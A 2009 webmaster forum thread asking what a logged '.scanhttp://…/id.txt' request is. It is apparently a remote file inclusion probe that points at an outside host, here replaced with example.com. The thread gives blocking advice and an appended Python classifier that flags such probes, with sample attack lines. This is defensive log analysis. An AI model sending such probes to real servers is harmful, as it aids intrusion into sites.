
Forum Moderators: Ocean10000 & phranque


Need to identify ".scan" exploit attempt

Russian server attempted to connect using .scanhttp and upload an exploit

     
1:01 am on Jul 14, 2009 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts: 319
votes: 0


Today I saw a new exploit attack in my Apache access log. I can't find any information via Google, so I am asking here. What exploit vector is this fellow in Saint Petersburg trying to use? I've never seen this one before and don't recognize the .scan control file type. What module uses that file type?

77.221.x.x - - [12/Jul/2009:13:44:09 -0700] GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"

Thanks in advance!

[edited by: jdMorgan at 1:39 am (utc) on July 14, 2009]
[edit reason] example.com for members' safety. [/edit]

3:57 am on July 14, 2009 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts: 319
votes: 0


Oops! I'm sorry about that, Jim.

5:16 pm on July 14, 2009 (gmt 0)

Senior Member

WebmasterWorld Senior Member jdmorgan is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Mar 31, 2002
posts:25430
votes: 0


No problem...

Personally, I don't know what these guys are up to, but I block any request that has "http" in the requested URL-path or query string, and I block libwww-perl with only a few exceptions.

Too many exploiters, so little time: I say 403 and be done with it...

Jim

5:34 pm on July 14, 2009 (gmt 0)

Full Member

10+ Year Member

joined:May 5, 2003
posts:319
votes: 0


I do block all http include attempts. This .scan vector is new to me and I can't find what application it belongs to. I'm just curious what they are trying to exploit by getting a hidden server function named scan.

BTW: Half of the XSS injection probes coming from the USSR have the user agent "Mozilla/5.0" - which I also block. I have not seen one legitimate browser that goes by that exact user agent.
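
The filters described in the replies above (refuse requests carrying a URL in the path or query string, refuse libwww-perl, refuse the bare "Mozilla/5.0" agent), written as a log classifier. This is an added example, not code from any poster in the thread. Assumptions: the log is in Apache combined format, an embedded URL is matched as `http://`, `https://` or `ftp://` after percent-decoding, and the sample lines are constructed (the first is the line from the opening post with the request's opening quote restored).

```python
import re
from urllib.parse import unquote

# Apache combined format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Assumption: "http in the URL" is narrowed to a scheme followed by ://
EMBEDDED_URL = re.compile(r'(?:https?|ftp)://', re.I)

def classify(line):
    """Return the reasons a log line looks like a probe (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    reasons = []
    # Decode twice so a double-encoded scheme (%2568ttp...) is still seen.
    target = unquote(unquote(m["target"]))
    if EMBEDDED_URL.search(target):
        reasons.append("url-in-request")
    if any(c in target for c in "\r\n\x00"):
        reasons.append("control-char")        # e.g. the trailing %0D
    agent = m["agent"]
    if "libwww-perl" in agent.lower():
        reasons.append("libwww-perl")
    if agent == "Mozilla/5.0":                # exact match only, real browsers say more
        reasons.append("bare-mozilla-ua")
    return reasons

# Constructed sample lines (documentation addresses and example hosts).
SAMPLE_LOG = [
    '77.221.x.x - - [12/Jul/2009:13:44:09 -0700] "GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"',
    '192.0.2.10 - - [12/Jul/2009:13:45:00 -0700] "GET /index.html HTTP/1.1" 200 5120 "http://www.example.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"',
    '198.51.100.7 - - [12/Jul/2009:13:46:30 -0700] "GET /page.php?inc=http%3A%2F%2Fhost.example%2Fid.txt HTTP/1.1" 403 137 "-" "Mozilla/5.0"',
]

def flagged(lines):
    """Map each suspicious line's client address to its reasons."""
    out = {}
    for line in lines:
        reasons = classify(line)
        if reasons:
            out[line.split(" ", 1)[0]] = reasons
    return out

if __name__ == "__main__":
    for host, reasons in flagged(SAMPLE_LOG).items():
        print(host, ", ".join(reasons))
```

Only the request target is inspected, so an ordinary `http://` referrer on a legitimate request (the second sample line) is not flagged.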